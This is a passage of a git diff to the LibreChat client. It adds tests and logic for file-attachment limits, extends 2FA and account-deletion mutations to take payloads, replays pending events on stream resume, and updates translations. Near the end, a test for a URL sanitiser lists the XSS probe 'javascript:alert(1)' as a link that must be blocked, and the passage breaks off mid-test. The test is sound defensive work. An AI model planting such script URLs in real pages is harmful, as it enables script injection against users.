diff --git a/client/src/components/SidePanel/Agents/__tests__/AgentFileConfig.spec.tsx b/client/src/components/SidePanel/Agents/__tests__/AgentFileConfig.spec.tsx index aeb0dd3ff9..2bbd3fea22 100644 --- a/client/src/components/SidePanel/Agents/__tests__/AgentFileConfig.spec.tsx +++ b/client/src/components/SidePanel/Agents/__tests__/AgentFileConfig.spec.tsx @@ -18,7 +18,7 @@ const mockEndpointsConfig: TEndpointsConfig = { 'Some Endpoint': { type: EModelEndpoint.custom, userProvide: false, order: 9999 }, }; -let mockFileConfig = mergeFileConfig({ +const defaultFileConfig = mergeFileConfig({ endpoints: { Moonshot: { fileLimit: 5 }, [EModelEndpoint.agents]: { fileLimit: 20 }, @@ -26,6 +26,8 @@ let mockFileConfig = mergeFileConfig({ }, }); +let mockFileConfig = defaultFileConfig; + jest.mock('~/data-provider', () => ({ useGetEndpointsQuery: () => ({ data: mockEndpointsConfig }), useGetFileConfig: ({ select }: { select?: (data: unknown) => unknown }) => ({ @@ -118,13 +120,16 @@ describe('AgentPanel file config resolution (useAgentFileConfig)', () => { }); describe('disabled state', () => { + beforeEach(() => { + mockFileConfig = defaultFileConfig; + }); + it('reports not disabled for standard config', () => { render(); expect(screen.getByTestId('disabled').textContent).toBe('false'); }); it('reports disabled when provider-specific config is disabled', () => { - const original = mockFileConfig; mockFileConfig = mergeFileConfig({ endpoints: { Moonshot: { disabled: true }, @@ -135,8 +140,44 @@ describe('AgentPanel file config resolution (useAgentFileConfig)', () => { render(); expect(screen.getByTestId('disabled').textContent).toBe('true'); + }); - mockFileConfig = original; + it('reports disabled when agents config is disabled and no provider set', () => { + mockFileConfig = mergeFileConfig({ + endpoints: { + [EModelEndpoint.agents]: { disabled: true }, + default: { fileLimit: 10 }, + }, + }); + + render(); + expect(screen.getByTestId('disabled').textContent).toBe('true'); 
+ }); + + it('reports disabled when agents is disabled and provider has no specific config', () => { + mockFileConfig = mergeFileConfig({ + endpoints: { + [EModelEndpoint.agents]: { disabled: true }, + default: { fileLimit: 10 }, + }, + }); + + render(); + expect(screen.getByTestId('disabled').textContent).toBe('true'); + }); + + it('provider-specific enabled overrides agents disabled', () => { + mockFileConfig = mergeFileConfig({ + endpoints: { + Moonshot: { disabled: false, fileLimit: 5 }, + [EModelEndpoint.agents]: { disabled: true }, + default: { fileLimit: 10 }, + }, + }); + + render(); + expect(screen.getByTestId('disabled').textContent).toBe('false'); + expect(screen.getByTestId('fileLimit').textContent).toBe('5'); }); }); diff --git a/client/src/components/SidePanel/Files/PanelTable.tsx b/client/src/components/SidePanel/Files/PanelTable.tsx index 2fc8f7031b..e67e16abdd 100644 --- a/client/src/components/SidePanel/Files/PanelTable.tsx +++ b/client/src/components/SidePanel/Files/PanelTable.tsx @@ -24,14 +24,14 @@ import { type ColumnFiltersState, } from '@tanstack/react-table'; import { - fileConfig as defaultFileConfig, - checkOpenAIStorage, - mergeFileConfig, megabyte, + mergeFileConfig, + checkOpenAIStorage, isAssistantsEndpoint, getEndpointFileConfig, - type TFile, + fileConfig as defaultFileConfig, } from 'librechat-data-provider'; +import type { TFile } from 'librechat-data-provider'; import { MyFilesModal } from '~/components/Chat/Input/Files/MyFilesModal'; import { useFileMapContext, useChatContext } from '~/Providers'; import { useLocalize, useUpdateFiles } from '~/hooks'; @@ -86,7 +86,7 @@ export default function DataTable({ columns, data }: DataTablePro const fileMap = useFileMapContext(); const { showToast } = useToastContext(); - const { setFiles, conversation } = useChatContext(); + const { files, setFiles, conversation } = useChatContext(); const { data: fileConfig = null } = useGetFileConfig({ select: (data) => mergeFileConfig(data), }); @@ 
-142,7 +142,15 @@ export default function DataTable({ columns, data }: DataTablePro return; } - if (fileData.bytes > (endpointFileConfig.fileSizeLimit ?? Number.MAX_SAFE_INTEGER)) { + if (endpointFileConfig.fileLimit && files.size >= endpointFileConfig.fileLimit) { + showToast({ + message: `${localize('com_ui_attach_error_limit')} ${endpointFileConfig.fileLimit} files (${endpoint})`, + status: 'error', + }); + return; + } + + if (fileData.bytes >= (endpointFileConfig.fileSizeLimit ?? Number.MAX_SAFE_INTEGER)) { showToast({ message: `${localize('com_ui_attach_error_size')} ${ (endpointFileConfig.fileSizeLimit ?? 0) / megabyte @@ -160,6 +168,22 @@ export default function DataTable({ columns, data }: DataTablePro return; } + if (endpointFileConfig.totalSizeLimit) { + const existing = files.get(fileData.file_id); + let currentTotalSize = 0; + for (const f of files.values()) { + currentTotalSize += f.size; + } + currentTotalSize -= existing?.size ?? 0; + if (currentTotalSize + fileData.bytes > endpointFileConfig.totalSizeLimit) { + showToast({ + message: `${localize('com_ui_attach_error_total_size')} ${endpointFileConfig.totalSizeLimit / megabyte} MB (${endpoint})`, + status: 'error', + }); + return; + } + } + addFile({ progress: 1, attached: true, @@ -175,7 +199,7 @@ export default function DataTable({ columns, data }: DataTablePro metadata: fileData.metadata, }); }, - [addFile, fileMap, conversation, localize, showToast, fileConfig], + [addFile, files, fileMap, conversation, localize, showToast, fileConfig], ); const filenameFilter = table.getColumn('filename')?.getFilterValue() as string; diff --git a/client/src/components/SidePanel/Files/__tests__/PanelTable.spec.tsx b/client/src/components/SidePanel/Files/__tests__/PanelTable.spec.tsx new file mode 100644 index 0000000000..2639d3c100 --- /dev/null +++ b/client/src/components/SidePanel/Files/__tests__/PanelTable.spec.tsx @@ -0,0 +1,239 @@ +import React from 'react'; +import { render, screen, fireEvent } from 
'@testing-library/react'; +import { FileSources } from 'librechat-data-provider'; +import type { TFile } from 'librechat-data-provider'; +import type { ExtendedFile } from '~/common'; +import DataTable from '../PanelTable'; +import { columns } from '../PanelColumns'; + +const mockShowToast = jest.fn(); +const mockAddFile = jest.fn(); + +let mockFileMap: Record = {}; +let mockFiles: Map = new Map(); +let mockConversation: Record | null = { endpoint: 'openAI' }; +let mockRawFileConfig: Record | null = { + endpoints: { + openAI: { fileLimit: 10, supportedMimeTypes: ['application/pdf', 'text/plain'] }, + }, +}; + +jest.mock('@librechat/client', () => ({ + Table: ({ children, ...props }: { children: React.ReactNode }) => ( + {children}
+ ), + Button: ({ + children, + ...props + }: { children: React.ReactNode } & React.ButtonHTMLAttributes) => ( + + ), + TableRow: ({ children, ...props }: { children: React.ReactNode }) => ( + {children} + ), + TableHead: ({ children, ...props }: { children: React.ReactNode }) => ( + {children} + ), + TableBody: ({ children, ...props }: { children: React.ReactNode }) => ( + {children} + ), + TableCell: ({ + children, + ...props + }: { children: React.ReactNode } & React.TdHTMLAttributes) => ( + {children} + ), + FilterInput: () => , + TableHeader: ({ children, ...props }: { children: React.ReactNode }) => ( + {children} + ), + useToastContext: () => ({ showToast: mockShowToast }), +})); + +jest.mock('~/Providers', () => ({ + useFileMapContext: () => mockFileMap, + useChatContext: () => ({ + files: mockFiles, + setFiles: jest.fn(), + conversation: mockConversation, + }), +})); + +jest.mock('~/hooks', () => ({ + useLocalize: () => (key: string) => key, + useUpdateFiles: () => ({ addFile: mockAddFile }), +})); + +jest.mock('~/data-provider', () => ({ + useGetFileConfig: ({ select }: { select?: (d: unknown) => unknown }) => ({ + data: select != null ? 
select(mockRawFileConfig) : mockRawFileConfig, + }), +})); + +jest.mock('~/components/Chat/Input/Files/MyFilesModal', () => ({ + MyFilesModal: () => null, +})); + +jest.mock('../PanelFileCell', () => ({ row }: { row: { original: TFile } }) => ( + {row.original?.filename} +)); + +function makeFile(overrides: Partial = {}): TFile { + return { + user: 'user-1', + file_id: 'file-1', + bytes: 1024, + embedded: false, + filename: 'test.pdf', + filepath: '/files/test.pdf', + object: 'file', + type: 'application/pdf', + usage: 0, + source: FileSources.local, + ...overrides, + }; +} + +function makeExtendedFile(overrides: Partial = {}): ExtendedFile { + return { + file_id: 'ext-1', + size: 1024, + progress: 1, + source: FileSources.local, + ...overrides, + }; +} + +function renderTable(data: TFile[]) { + return render(); +} + +function clickFilenameCell() { + const cells = screen.getAllByRole('button'); + const filenameCell = cells.find( + (cell) => cell.tagName === 'TD' && cell.textContent && !cell.textContent.includes('com_ui_'), + ); + if (!filenameCell) { + throw new Error('Could not find filename cell with role="button" — check mock setup'); + } + fireEvent.click(filenameCell); + return filenameCell; +} + +describe('PanelTable handleFileClick', () => { + beforeEach(() => { + mockShowToast.mockClear(); + mockAddFile.mockClear(); + mockFiles = new Map(); + mockConversation = { endpoint: 'openAI' }; + mockRawFileConfig = { + endpoints: { + openAI: { + fileLimit: 5, + totalSizeLimit: 10, + supportedMimeTypes: ['application/pdf', 'text/plain'], + }, + }, + }; + }); + + it('calls addFile when within file limits', () => { + const file = makeFile(); + mockFileMap = { [file.file_id]: file }; + + renderTable([file]); + clickFilenameCell(); + + expect(mockAddFile).toHaveBeenCalledTimes(1); + expect(mockAddFile).toHaveBeenCalledWith( + expect.objectContaining({ + file_id: file.file_id, + attached: true, + progress: 1, + }), + ); + 
expect(mockShowToast).not.toHaveBeenCalledWith(expect.objectContaining({ status: 'error' })); + }); + + it('blocks attachment when fileLimit is reached', () => { + const file = makeFile({ file_id: 'new-file', filename: 'new.pdf' }); + mockFileMap = { [file.file_id]: file }; + + mockFiles = new Map( + Array.from({ length: 5 }, (_, i) => [ + `existing-${i}`, + makeExtendedFile({ file_id: `existing-${i}` }), + ]), + ); + + renderTable([file]); + clickFilenameCell(); + + expect(mockAddFile).not.toHaveBeenCalled(); + expect(mockShowToast).toHaveBeenCalledWith( + expect.objectContaining({ + message: expect.stringContaining('com_ui_attach_error_limit'), + status: 'error', + }), + ); + }); + + it('blocks attachment when totalSizeLimit would be exceeded', () => { + const MB = 1024 * 1024; + const largeFile = makeFile({ file_id: 'large-file', bytes: 6 * MB }); + mockFileMap = { [largeFile.file_id]: largeFile }; + + mockFiles = new Map([ + ['existing-1', makeExtendedFile({ file_id: 'existing-1', size: 5 * MB })], + ]); + + renderTable([largeFile]); + clickFilenameCell(); + + expect(mockAddFile).not.toHaveBeenCalled(); + expect(mockShowToast).toHaveBeenCalledWith( + expect.objectContaining({ + message: expect.stringContaining('com_ui_attach_error_total_size'), + status: 'error', + }), + ); + }); + + it('does not double-count size of already-attached file', () => { + const MB = 1024 * 1024; + const file = makeFile({ file_id: 'reattach', bytes: 5 * MB }); + mockFileMap = { [file.file_id]: file }; + + mockFiles = new Map([ + ['reattach', makeExtendedFile({ file_id: 'reattach', size: 5 * MB })], + ['other', makeExtendedFile({ file_id: 'other', size: 4 * MB })], + ]); + + renderTable([file]); + clickFilenameCell(); + + expect(mockAddFile).toHaveBeenCalledTimes(1); + expect(mockShowToast).not.toHaveBeenCalledWith( + expect.objectContaining({ + message: expect.stringContaining('com_ui_attach_error_total_size'), + }), + ); + }); + + it('allows attachment when just under fileLimit', () 
=> { + const file = makeFile({ file_id: 'under-limit' }); + mockFileMap = { [file.file_id]: file }; + + mockFiles = new Map( + Array.from({ length: 4 }, (_, i) => [ + `existing-${i}`, + makeExtendedFile({ file_id: `existing-${i}` }), + ]), + ); + + renderTable([file]); + clickFilenameCell(); + + expect(mockAddFile).toHaveBeenCalledTimes(1); + }); +}); diff --git a/client/src/data-provider/Auth/mutations.ts b/client/src/data-provider/Auth/mutations.ts index 298ddd9b64..9930e42b4f 100644 --- a/client/src/data-provider/Auth/mutations.ts +++ b/client/src/data-provider/Auth/mutations.ts @@ -68,14 +68,14 @@ export const useRefreshTokenMutation = ( /* User */ export const useDeleteUserMutation = ( - options?: t.MutationOptions, -): UseMutationResult => { + options?: t.MutationOptions, +): UseMutationResult => { const queryClient = useQueryClient(); const clearStates = useClearStates(); const resetDefaultPreset = useResetRecoilState(store.defaultPreset); return useMutation([MutationKeys.deleteUser], { - mutationFn: () => dataService.deleteUser(), + mutationFn: (payload?: t.TDeleteUserRequest) => dataService.deleteUser(payload), ...(options || {}), onSuccess: (...args) => { resetDefaultPreset(); @@ -90,11 +90,11 @@ export const useDeleteUserMutation = ( export const useEnableTwoFactorMutation = (): UseMutationResult< t.TEnable2FAResponse, unknown, - void, + t.TEnable2FARequest | undefined, unknown > => { const queryClient = useQueryClient(); - return useMutation(() => dataService.enableTwoFactor(), { + return useMutation((payload?: t.TEnable2FARequest) => dataService.enableTwoFactor(payload), { onSuccess: (data) => { queryClient.setQueryData([QueryKeys.user, '2fa'], data); }, @@ -146,15 +146,18 @@ export const useDisableTwoFactorMutation = (): UseMutationResult< export const useRegenerateBackupCodesMutation = (): UseMutationResult< t.TRegenerateBackupCodesResponse, unknown, - void, + t.TRegenerateBackupCodesRequest | undefined, unknown > => { const queryClient = 
useQueryClient(); - return useMutation(() => dataService.regenerateBackupCodes(), { - onSuccess: (data) => { - queryClient.setQueryData([QueryKeys.user, '2fa', 'backup'], data); + return useMutation( + (payload?: t.TRegenerateBackupCodesRequest) => dataService.regenerateBackupCodes(payload), + { + onSuccess: (data) => { + queryClient.setQueryData([QueryKeys.user, '2fa', 'backup'], data); + }, }, - }); + ); }; export const useVerifyTwoFactorTempMutation = ( diff --git a/client/src/hooks/Artifacts/__tests__/useArtifactProps.test.ts b/client/src/hooks/Artifacts/__tests__/useArtifactProps.test.ts index f9f29e0c56..e46a285c50 100644 --- a/client/src/hooks/Artifacts/__tests__/useArtifactProps.test.ts +++ b/client/src/hooks/Artifacts/__tests__/useArtifactProps.test.ts @@ -112,7 +112,7 @@ describe('useArtifactProps', () => { expect(result.current.files['content.md']).toBe('# No content provided'); }); - it('should provide marked-react dependency', () => { + it('should provide react-markdown dependency', () => { const artifact = createArtifact({ type: 'text/markdown', content: '# Test', @@ -120,7 +120,9 @@ describe('useArtifactProps', () => { const { result } = renderHook(() => useArtifactProps({ artifact })); - expect(result.current.sharedProps.customSetup?.dependencies).toHaveProperty('marked-react'); + expect(result.current.sharedProps.customSetup?.dependencies).toHaveProperty('react-markdown'); + expect(result.current.sharedProps.customSetup?.dependencies).toHaveProperty('remark-gfm'); + expect(result.current.sharedProps.customSetup?.dependencies).toHaveProperty('remark-breaks'); }); it('should update files when content changes', () => { diff --git a/client/src/hooks/Input/useQueryParams.ts b/client/src/hooks/Input/useQueryParams.ts index b29f408a3a..85b5d8838b 100644 --- a/client/src/hooks/Input/useQueryParams.ts +++ b/client/src/hooks/Input/useQueryParams.ts @@ -12,6 +12,7 @@ import type { import { clearModelForNonEphemeralAgent, removeUnavailableTools, + 
specDisplayFieldReset, processValidSettings, getModelSpecIconURL, getConvoSwitchLogic, @@ -128,13 +129,10 @@ export default function useQueryParams({ endpointsConfig, }); - let resetParams = {}; + const resetFields = newPreset.spec == null ? specDisplayFieldReset : {}; if (newPreset.spec == null) { - template.spec = null; - template.iconURL = null; - template.modelLabel = null; - resetParams = { spec: null, iconURL: null, modelLabel: null }; - newPreset = { ...newPreset, ...resetParams }; + Object.assign(template, specDisplayFieldReset); + newPreset = { ...newPreset, ...specDisplayFieldReset }; } // Sync agent_id from newPreset to template, then clear model if non-ephemeral agent @@ -152,7 +150,7 @@ export default function useQueryParams({ conversation: { ...(conversation ?? {}), endpointType: template.endpointType, - ...resetParams, + ...resetFields, }, preset: template, cleanOutput: newPreset.spec != null && newPreset.spec !== '', diff --git a/client/src/hooks/SSE/useResumableSSE.ts b/client/src/hooks/SSE/useResumableSSE.ts index 831bf042ad..4d4cb4841a 100644 --- a/client/src/hooks/SSE/useResumableSSE.ts +++ b/client/src/hooks/SSE/useResumableSSE.ts @@ -226,12 +226,12 @@ export default function useResumableSSE( if (data.sync != null) { console.log('[ResumableSSE] SYNC received', { runSteps: data.resumeState?.runSteps?.length ?? 0, + pendingEvents: data.pendingEvents?.length ?? 0, }); const runId = v4(); setActiveRunId(runId); - // Replay run steps if (data.resumeState?.runSteps) { for (const runStep of data.resumeState.runSteps) { stepHandler({ event: 'on_run_step', data: runStep }, { @@ -241,19 +241,15 @@ export default function useResumableSSE( } } - // Set message content from aggregatedContent if (data.resumeState?.aggregatedContent && userMessage?.messageId) { const messages = getMessages() ?? 
[]; const userMsgId = userMessage.messageId; const serverResponseId = data.resumeState.responseMessageId; - // Find the EXACT response message - prioritize responseMessageId from server - // This is critical when there are multiple responses to the same user message let responseIdx = -1; if (serverResponseId) { responseIdx = messages.findIndex((m) => m.messageId === serverResponseId); } - // Fallback: find by parentMessageId pattern (for new messages) if (responseIdx < 0) { responseIdx = messages.findIndex( (m) => @@ -272,7 +268,6 @@ export default function useResumableSSE( }); if (responseIdx >= 0) { - // Update existing response message with aggregatedContent const updated = [...messages]; const oldContent = updated[responseIdx]?.content; updated[responseIdx] = { @@ -285,25 +280,34 @@ export default function useResumableSSE( newContentLength: data.resumeState.aggregatedContent?.length, }); setMessages(updated); - // Sync both content handler and step handler with the updated message - // so subsequent deltas build on synced content, not stale content resetContentHandler(); syncStepMessage(updated[responseIdx]); console.log('[ResumableSSE] SYNC complete, handlers synced'); } else { - // Add new response message const responseId = serverResponseId ?? `${userMsgId}_`; - setMessages([ - ...messages, - { - messageId: responseId, - parentMessageId: userMsgId, - conversationId: currentSubmission.conversation?.conversationId ?? '', - text: '', - content: data.resumeState.aggregatedContent, - isCreatedByUser: false, - } as TMessage, - ]); + const newMessage = { + messageId: responseId, + parentMessageId: userMsgId, + conversationId: currentSubmission.conversation?.conversationId ?? 
'', + text: '', + content: data.resumeState.aggregatedContent, + isCreatedByUser: false, + } as TMessage; + setMessages([...messages, newMessage]); + resetContentHandler(); + syncStepMessage(newMessage); + } + } + + if (data.pendingEvents?.length > 0) { + console.log(`[ResumableSSE] Replaying ${data.pendingEvents.length} pending events`); + const submission = { ...currentSubmission, userMessage } as EventSubmission; + for (const pendingEvent of data.pendingEvents) { + if (pendingEvent.event != null) { + stepHandler(pendingEvent, submission); + } else if (pendingEvent.type != null) { + contentHandler({ data: pendingEvent, submission }); + } } } diff --git a/client/src/locales/en/translation.json b/client/src/locales/en/translation.json index 72cd702622..315d35d6bb 100644 --- a/client/src/locales/en/translation.json +++ b/client/src/locales/en/translation.json @@ -368,6 +368,7 @@ "com_error_illegal_model_request": "The model \"{{0}}\" is not available for {{1}}. Please select a different model.", "com_error_input_length": "The latest message token count is too long, exceeding the token limit, or your token limit parameters are misconfigured, adversely affecting the context window. More info: {{0}}. Please shorten your message, adjust the max context size from the conversation parameters, or fork the conversation to continue.", "com_error_invalid_agent_provider": "The \"{{0}}\" provider is not available for use with Agents. Please go to your agent's settings and select a currently available provider.", + "com_error_invalid_base_url": "The base URL you provided targets a restricted address. Please use a valid external URL and try again.", "com_error_invalid_user_key": "Invalid key provided. Please provide a valid key and try again.", "com_error_missing_model": "No model selected for {{0}}. Please select a model and try again.", "com_error_models_not_loaded": "Models configuration could not be loaded. 
Please refresh the page and try again.", @@ -639,6 +640,7 @@ "com_ui_2fa_generate_error": "There was an error generating two-factor authentication settings", "com_ui_2fa_invalid": "Invalid two-factor authentication code", "com_ui_2fa_setup": "Setup 2FA", + "com_ui_2fa_verification_required": "Enter your 2FA code to continue", "com_ui_2fa_verified": "Successfully verified Two-Factor Authentication", "com_ui_accept": "I accept", "com_ui_action_button": "Action Button", @@ -746,8 +748,10 @@ "com_ui_at_least_one_owner_required": "At least one owner is required", "com_ui_attach_error": "Cannot attach file. Create or select a conversation, or try refreshing the page.", "com_ui_attach_error_disabled": "File uploads are disabled for this endpoint", + "com_ui_attach_error_limit": "File limit reached:", "com_ui_attach_error_openai": "Cannot attach Assistant files to other endpoints", "com_ui_attach_error_size": "File size limit exceeded for endpoint:", + "com_ui_attach_error_total_size": "Total file size limit exceeded for endpoint:", "com_ui_attach_error_type": "Unsupported file type for endpoint:", "com_ui_attach_remove": "Remove file", "com_ui_attach_warn_endpoint": "Non-Assistant files may be ignored without a compatible tool", diff --git a/client/src/locales/fr/translation.json b/client/src/locales/fr/translation.json index c9d78ac3f5..7838b33739 100644 --- a/client/src/locales/fr/translation.json +++ b/client/src/locales/fr/translation.json @@ -1203,7 +1203,7 @@ "com_ui_upload_image_input": "Téléverser une image", "com_ui_upload_invalid": "Fichier non valide pour le téléchargement. L'image ne doit pas dépasser la limite", "com_ui_upload_invalid_var": "Fichier non valide pour le téléchargement. 
L'image ne doit pas dépasser {{0}} Mo", - "com_ui_upload_ocr_text": "Téléchager en tant que texte", + "com_ui_upload_ocr_text": "Télécharger en tant que texte", "com_ui_upload_provider": "Télécharger vers le fournisseur", "com_ui_upload_success": "Fichier téléversé avec succès", "com_ui_upload_type": "Sélectionner le type de téléversement", diff --git a/client/src/locales/lv/translation.json b/client/src/locales/lv/translation.json index 76c2db24ea..57794a9e2a 100644 --- a/client/src/locales/lv/translation.json +++ b/client/src/locales/lv/translation.json @@ -39,7 +39,7 @@ "com_agents_description_card": "Apraksts: {{description}}", "com_agents_description_placeholder": "Pēc izvēles: aprakstiet savu aģentu šeit", "com_agents_empty_state_heading": "Nav atrasts neviens aģents", - "com_agents_enable_file_search": "Iespējot vektorizēto meklēšanu", + "com_agents_enable_file_search": "Iespējot meklēšanu dokumentos", "com_agents_error_bad_request_message": "Pieprasījumu nevarēja apstrādāt.", "com_agents_error_bad_request_suggestion": "Lūdzu, pārbaudiet ievadītos datus un mēģiniet vēlreiz.", "com_agents_error_category_title": "Kategorija Kļūda", @@ -66,7 +66,7 @@ "com_agents_file_context_description": "Visi augšupielādētie faili tiek pilnībā pārveidoti tekstā un nekavējoties pievienoti aģenta pamata kontekstam kā nemainīgs saturs, kas pieejams visu sarunas laiku. Ja augšupielādētajam faila tipam ir pieejams vai konfigurēts OCR, teksta izvilkšana notiek automātiski. 
Šī metode ir piemērota gadījumos, kad nepieciešams analizēt visu dokumenta, attēla ar tekstu vai PDF faila saturu, taču jāņem vērā, ka tas ievērojami palielina atmiņas patēriņu un izmaksas.", "com_agents_file_context_disabled": "Pirms failu augšupielādes, lai to pievienotu kā kontekstu, ir jāizveido aģents.", "com_agents_file_context_label": "Pievienot failu kā kontekstu", - "com_agents_file_search_disabled": "Lai varētu iespējot vektorizētu meklēšanu ir jāizveido aģents.", + "com_agents_file_search_disabled": "Lai varētu iespējot meklēšanu dokumentos ir jāizveido aģents.", "com_agents_file_search_info": "Kad šī opcija ir iespējota, aģents izmanto vektorizētu datu meklēšanu (RAG pieeju), kas ļauj efektīvi un izmaksu ziņā izdevīgi izgūt atbilstošu kontekstu tikai no būtiskākajām faila daļām, balstoties uz lietotāja jautājumu, nevis analizē visu failu pilnā apjomā.", "com_agents_grid_announcement": "Rādu {{count}} aģentus {{category}} kategorijā", "com_agents_instructions_placeholder": "Sistēmas instrukcijas, ko izmantos aģents", @@ -126,7 +126,7 @@ "com_assistants_delete_actions_success": "Darbība veiksmīgi dzēsta no asistenta", "com_assistants_description_placeholder": "Pēc izvēles: Šeit aprakstiet savu asistentu", "com_assistants_domain_info": "Asistents nosūtīja šo informāciju {{0}}", - "com_assistants_file_search": "Vektorizētā Meklēšana (RAG)", + "com_assistants_file_search": "Meklēšana dokumentos", "com_assistants_file_search_info": "Šī funkcija ļauj asistentam izmantot augšupielādēto failu saturu, pievienojot zināšanas tieši no lietotāja vai citu lietotāju failiem. Pēc faila augšupielādes asistents automātiski identificē un izgūst nepieciešamās teksta daļas atbilstoši lietotāja pieprasījumam, neiekļaujot visu failu pilnā apjomā. 
Vektoru datubāzu (vector store) pieslēgšana tieši šai funkcijai šobrīd nav atbalstīta; tās iespējams pievienot tikai Provider Playground vidē vai augšupielādējot failus sarunas pavedienam ikreizējai meklēšanai.", "com_assistants_function_use": "Izmantotais asistents {{0}}", "com_assistants_image_vision": "Attēla redzējums", @@ -136,7 +136,7 @@ "com_assistants_knowledge_info": "Ja augšupielādējat failus sadaļā Zināšanas, sarunās ar asistentu var tikt iekļauts faila saturs.", "com_assistants_max_starters_reached": "Sasniegts maksimālais sarunu uzsākšanas iespēju skaits", "com_assistants_name_placeholder": "Pēc izvēles: Asistenta nosaukums", - "com_assistants_non_retrieval_model": "Šajā modelī vektorizētā meklēšana nav iespējota. Lūdzu, izvēlieties citu modeli.", + "com_assistants_non_retrieval_model": "Šajā modelī meklēšana dokumentos nav iespējota. Lūdzu, izvēlieties citu modeli.", "com_assistants_retrieval": "Atgūšana", "com_assistants_running_action": "Darbība palaista", "com_assistants_running_var": "Strādā {{0}}", @@ -232,7 +232,7 @@ "com_endpoint_anthropic_thinking_budget": "Nosaka maksimālo žetonu skaitu, ko Claude drīkst izmantot savā iekšējā spriešanas procesā. Lielāki budžeti var uzlabot atbilžu kvalitāti, nodrošinot rūpīgāku analīzi sarežģītām problēmām, lai gan Claude var neizmantot visu piešķirto budžetu, īpaši diapazonos virs 32 000. Šim iestatījumam jābūt zemākam par \"Maksimālie izvades tokeni\".", "com_endpoint_anthropic_topk": "Top-k maina to, kā modelis atlasa marķierus izvadei. Ja top-k ir 1, tas nozīmē, ka atlasītais marķieris ir visticamākais starp visiem modeļa vārdu krājumā esošajiem marķieriem (to sauc arī par alkatīgo dekodēšanu), savukārt, ja top-k ir 3, tas nozīmē, ka nākamais marķieris tiek izvēlēts no 3 visticamākajiem marķieriem (izmantojot temperatūru).", "com_endpoint_anthropic_topp": "`Top-p` maina to, kā modelis atlasa marķierus izvadei. 
Marķieri tiek atlasīti no K (skatīt parametru topK) ticamākās līdz vismazāk ticamajai, līdz to varbūtību summa ir vienāda ar `top-p` vērtību.", - "com_endpoint_anthropic_use_web_search": "Iespējojiet tīmekļa meklēšanas funkcionalitāti, izmantojot Anthropic iebūvētās meklēšanas iespējas. Tas ļauj modelim meklēt tīmeklī jaunāko informāciju un sniegt precīzākas un aktuālākas atbildes.", + "com_endpoint_anthropic_use_web_search": "Iespējojiet meklēšanu tīmeklī funkcionalitāti, izmantojot Anthropic iebūvētās meklēšanas iespējas. Tas ļauj modelim meklēt tīmeklī jaunāko informāciju un sniegt precīzākas un aktuālākas atbildes.", "com_endpoint_assistant": "Asistents", "com_endpoint_assistant_model": "Asistenta modelis", "com_endpoint_assistant_placeholder": "Lūdzu, labajā sānu panelī atlasiet asistentu.", @@ -1486,7 +1486,7 @@ "com_ui_version_var": "Versija {{0}}", "com_ui_versions": "Versijas", "com_ui_view_memory": "Skatīt atmiņu", - "com_ui_web_search": "Tīmekļa meklēšana", + "com_ui_web_search": "Meklēšana tīmeklī", "com_ui_web_search_cohere_key": "Ievadiet Cohere API atslēgu", "com_ui_web_search_firecrawl_url": "Firecrawl API URL (pēc izvēles)", "com_ui_web_search_jina_key": "Ievadiet Jina API atslēgu", diff --git a/client/src/routes/ChatRoute.tsx b/client/src/routes/ChatRoute.tsx index dcb58c3f49..a17d349037 100644 --- a/client/src/routes/ChatRoute.tsx +++ b/client/src/routes/ChatRoute.tsx @@ -6,20 +6,21 @@ import { Constants, EModelEndpoint } from 'librechat-data-provider'; import { useGetModelsQuery } from 'librechat-data-provider/react-query'; import type { TPreset } from 'librechat-data-provider'; import { - useNewConvo, - useAppStartup, + mergeQuerySettingsWithSpec, + processValidSettings, + getDefaultModelSpec, + getModelSpecPreset, + isNotFoundError, + logger, +} from '~/utils'; +import { useAssistantListMap, useIdChangeEffect, + useAppStartup, + useNewConvo, useLocalize, } from '~/hooks'; import { useGetConvoIdQuery, useGetStartupConfig, useGetEndpointsQuery } 
from '~/data-provider'; -import { - getDefaultModelSpec, - getModelSpecPreset, - processValidSettings, - logger, - isNotFoundError, -} from '~/utils'; import { ToolCallsMapProvider } from '~/Providers'; import ChatView from '~/components/Chat/ChatView'; import { NotificationSeverity } from '~/common'; @@ -102,9 +103,10 @@ export default function ChatRoute() { }); const querySettings = processValidSettings(queryParams); - return Object.keys(querySettings).length > 0 - ? { ...specPreset, ...querySettings } - : specPreset; + if (Object.keys(querySettings).length > 0) { + return mergeQuerySettingsWithSpec(specPreset, querySettings); + } + return specPreset; }; if (isNewConvo && endpointsQuery.data && modelsQuery.data) { diff --git a/client/src/utils/__tests__/markdown.test.ts b/client/src/utils/__tests__/markdown.test.ts index fcc0f169e6..9734e0e18a 100644 --- a/client/src/utils/__tests__/markdown.test.ts +++ b/client/src/utils/__tests__/markdown.test.ts @@ -1,4 +1,72 @@ -import { getMarkdownFiles } from '../markdown'; +import { isSafeUrl, getMarkdownFiles } from '../markdown'; + +describe('isSafeUrl', () => { + it('allows https URLs', () => { + expect(isSafeUrl('https://example.com')).toBe(true); + }); + + it('allows http URLs', () => { + expect(isSafeUrl('http://example.com/path')).toBe(true); + }); + + it('allows mailto links', () => { + expect(isSafeUrl('mailto:user@example.com')).toBe(true); + }); + + it('allows tel links', () => { + expect(isSafeUrl('tel:+1234567890')).toBe(true); + }); + + it('allows relative paths', () => { + expect(isSafeUrl('/path/to/page')).toBe(true); + expect(isSafeUrl('./relative')).toBe(true); + expect(isSafeUrl('../parent')).toBe(true); + }); + + it('allows anchor links', () => { + expect(isSafeUrl('#section')).toBe(true); + }); + + it('blocks javascript: protocol', () => { + expect(isSafeUrl('javascript:alert(1)')).toBe(false); + }); + + it('blocks javascript: with leading whitespace', () => { + expect(isSafeUrl(' 
